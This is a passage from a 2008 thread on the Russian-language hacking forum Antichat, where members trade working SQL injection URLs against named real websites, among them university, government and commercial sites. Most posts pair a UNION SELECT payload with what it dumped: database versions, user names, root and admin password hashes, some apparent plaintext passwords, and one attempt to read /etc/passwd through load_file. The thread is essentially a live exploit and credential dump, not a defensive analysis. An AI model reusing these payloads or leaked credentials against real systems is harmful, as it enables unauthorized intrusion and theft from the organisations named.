ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5271  
Старый 07.04.2008, 22:13
Muhacir
Участник форума
Регистрация: 05.10.2006
Сообщений: 133
Провел на форуме:
548338

Репутация: 165
Отправить сообщение для Muhacir с помощью ICQ
По умолчанию

Цитата:
Сообщение от bag  
Код:
http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,concat(user,0x3a,password),5,6,7,8,9,10+from+mysql.user/*
кто пройдет дальше отпишите чтоли)
http://pilosos.com/web/mas_pilo/deportes.php?inid=9999999999+UNION+SELECT+1,2,3,lo ad_file('/etc/passwd'),5,6,7,8,9,10+from+mysql.user/*

load_file
 
Ответить с цитированием

  #5272  
Старый 08.04.2008, 14:09
bag
Участник форума
Регистрация: 06.03.2008
Сообщений: 105
Провел на форуме:
253346

Репутация: 146
По умолчанию

Код:
http://www.cerias.purdue.edu/about/FAQs/view.php?catid=99999999+UNION+SELECT+1,2,concat_ws(0x3a,username,userpasswd),4+from+dbforms_user/*
5.0.44-log
cerias_www
webuser@kargad.cerias.purdue.edu
admin:fa70c9ea3c56f56440e565e28e046a6d

Код:
http://www.comexus.org.mx/Summer/participants.php?id=9999999+UNION+SELECT+concat(user,0x3a,password)+from+mysql.user/*
5.0.27-standard
cmeadmin_comexus@comexus.org.mx

root:*9709835E424A4547ADC49E973DF05221F5788033

Код:
http://www.takj.gov.cn/show.php?id=9999999999999999'+UNION+SELECT+1,concat(user,0x3a,password),3,4,5,6,7,8,9,10,11+from+mysql.user+limit+0,1/*
4.0.24-nt
chengguo@localhost

chengguo:255ae04c2135cdd9

Код:
http://www.sborsedlec.cz/index.php?option=com_myalbum&album=99999999/**/UNION/**/SELECT/**/1,2,concat(user,password),4,5+from+mysql.user/*
5.0.45-Debian_1-log
kamilecko@localhost

root

debian-sys-maint*E944BA4811D33C20C9DD89DB1669186D0AFBACE5


Код:
http://www.zacro.co.zw/index.php?option=com_myalbum&album=-1+union+select+1,2,password,4,5+from+mysql.user+limit+0,1/*
*0D2F033F991098398763E1BBB9383BAA4C9D6683

Код:
http://techjobskollam.gov.in/index.php?option=com_myalbum&album=99999999/**/UNION/**/SELECT/**/1,2,concat(user,0x3a,password),4,5+from+mysql.user/*
5.0.22
root@localhost

root:02793fd200b31a19

Код:
http://www.hhne.org/index.php?pgid=999999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user,0x3a,password),17+from+mysql.user/*
yroot:499e19e660225444

Код:
http://wikipedia.aksw.org/index.php?qid=9999999999+UNION+SELECT+1,concat_ws(0x3a,user,password),3,4,5+from+mysql.user/*
5.0.38-Dotdeb_1.dotdeb.0-log
root@localhost

root:*76AF2D7B9C25E2D32355578842125DE03FD0CFDD

Код:
http://www.mcguireglobalrecruitment.com/careerFairs.php?fid=9999999+UNION+SELECT+1,concat(user,0x3a,password),3,4,5,6,7+from+mysql.user/*
5.0.37-standard
mcguireglobal@localhost

root:5a7f6b305ae8f33f : fpara

Код:
http://www.seaportvillage.com/restaurants/retailer.php?rid=999999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+mysql.user+limit+0,1/*
Код:
http://www.seaportvillage.com/restaurants/retailer.php?rid=999999999999/**/UNION/**/SELECT/**/1,concat_ws(0x3a,user,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+mysql.user/*

5.0.27
website@localhost

root:
wikiuser:07b2a22645a08a9c : sup3rm@n

Код:
http://www.rba.ru/news/vid_news.php?id=999999999+UNION+SELECT+1,2,concat(user,password),4,5,6,7,8,9,10,11,12,13,14+from+mysql.user/*
4.0.24_Debian-10sarge1-log
root@localhost

root
nobody
mnogo5a7004084ef44a99
debian-sys-maint45688eb06db8e261
super15c956b5675c9821
test606717496665bcba
rba


Код:
http://www.sdbireras.ru/product_detail.php?id=9999999+UNION+SELECT+user,password+from+mysql.user+limit+0,1/*
4.1.20
root@localhost

root:765ba8f84be69cdd

Код:
http://www.artport.co.nz/view.php?med=9999999999999+UNION+SELECT+concat(user,0x3a,password),2,3,4+from+mysql.user/*
4.0.20
webuser@localhost

root:57f7a24f45500f72

Последний раз редактировалось bag; 08.04.2008 в 14:17..
 
Ответить с цитированием

  #5273  
Старый 08.04.2008, 16:45
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию

Было это или нет хз,но вот ))

1. http://rusarhiiv.pohjarannik.ee/print.php?sid=-89+union+select+uname,2,3,4,5,6+from+nuke_users+li mit+1,1

http://rusarhiiv.pohjarannik.ee/print.php?sid=-89+union+select+pass,2,3,4,5,6+from+nuke_users+lim it+1,1

Тут два вариант - или моя голова не работает,или concat_ws xDD.

2. http://www.laptopshowcase.co.uk/downloads.php?id=-1+group+by+10+union+select+1,2,id,4,5,6,7,8,9,10,1 1/

Есь таблицы Suppliers, products и т.д. (подбирать не стал,лень :Р

P.S. dipl.spb.ru был взломан, ток ща не работает )
 
Ответить с цитированием

  #5274  
Старый 08.04.2008, 23:39
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

http://www.mirmet.spb.ru/catalog.php?g=1&c=-1+union+select+1,2,3,concat(user(),char(58),versio n(),char(58),database()),5,6,7/*

mirmet@localhost
4.0.23-standard
db_mirmet
 
Ответить с цитированием

  #5275  
Старый 09.04.2008, 14:12
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

bit16.ru
Путь: /home/us4258/bit16.ru/www/src/title.php on line 74
INJ:
Отображаеться в теге
PHP код:
<title></title
Database():db4258b
Version():5.0.33
user():us4258a@localhost
Цитата:
http://bit16.ru/index.php?gl=roms&cat=x32&act=cont'union+select+1, 2,3,user()/*
 
Ответить с цитированием

  #5276  
Старый 09.04.2008, 21:34
.acme
Участник форума
Регистрация: 08.11.2007
Сообщений: 102
Провел на форуме:
1266776

Репутация: 93
По умолчанию

http://www.endiama.co.ao/news.php?id=9999+union+select+1,2,3,4,concat_ws(0x 40,id,username,password)+from+users+limit+0,1--

1@webmaster@web123master
2@endiama@endiama198web

Пароли убили.

http://gdf.org.ly/index.php?lang=en&CAT_NO=3&Page=105&DATA_NO=-136+union+select+1,2,3,concat_ws(0x40,user(),datab ase(),version()),5,concat_ws(0x40,name,pass),7,8,9 ,10,11,12,13,14,15,16,17+from+users--

gdforg_gdf@localhost@gdforg_new@4.1.22-standard
Administrator@aa63633f1f89fa976bdbe073d9f2e2d3

Учусь..

http://www.soc.com.ly/media/index.php?cid=1&id=-9+union+select+1,concat_ws(0x40,user(),database(), version()),3,4,5,6,7,8,9,10,11,12+from+users/*

Последний раз редактировалось .acme; 09.04.2008 в 21:39..
 
Ответить с цитированием

  #5277  
Старый 10.04.2008, 10:30
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

Продажа программного обеспечения
http://itex.ru/po/sale/?pid=-4+union+select+1--
version - 5.0.41-log
user - itex@cub.mplik.ru
database - itex
 
Ответить с цитированием

  #5278  
Старый 10.04.2008, 12:40
Dimi4
Reservists Of Antichat - Level 6
Регистрация: 19.03.2007
Сообщений: 953
Провел на форуме:
7617458

Репутация: 3965


Отправить сообщение для Dimi4 с помощью ICQ
По умолчанию

Цитата:
Сообщение от -=megahertz=-  
Продажа программного обеспечения
http://itex.ru/po/sale/?pid=-4+union+select+1--
version - 5.0.41-log
user - itex@cub.mplik.ru
database - itex
уто ищо и рут походу
_http://itex.ru/po/sale/?pid=-4+union+select+1,2,TABLE_NAME,4+from+information_s chema.tables/*
 
Ответить с цитированием

  #5279  
Старый 10.04.2008, 22:25
-=megahertz=-
Участник форума
Регистрация: 23.05.2007
Сообщений: 103
Провел на форуме:
380957

Репутация: 56
Отправить сообщение для -=megahertz=- с помощью ICQ
По умолчанию

Цитата:
Сообщение от Dimi4  
уто ищо и рут походу
_http://itex.ru/po/sale/?pid=-4+union+select+1,2,TABLE_NAME,4+from+information_s chema.tables/*
я вкурсе, выкладываю тут не по причине незнания...
 
Ответить с цитированием

  #5280  
Старый 10.04.2008, 22:27
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию

Цитата:
Сообщение от -=megahertz=-  
я вкурсе, выкладываю тут не по причине незнания...

блин а если в курсе и можешь достать какого не делаешь? получается что сделал ты на половину ...
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ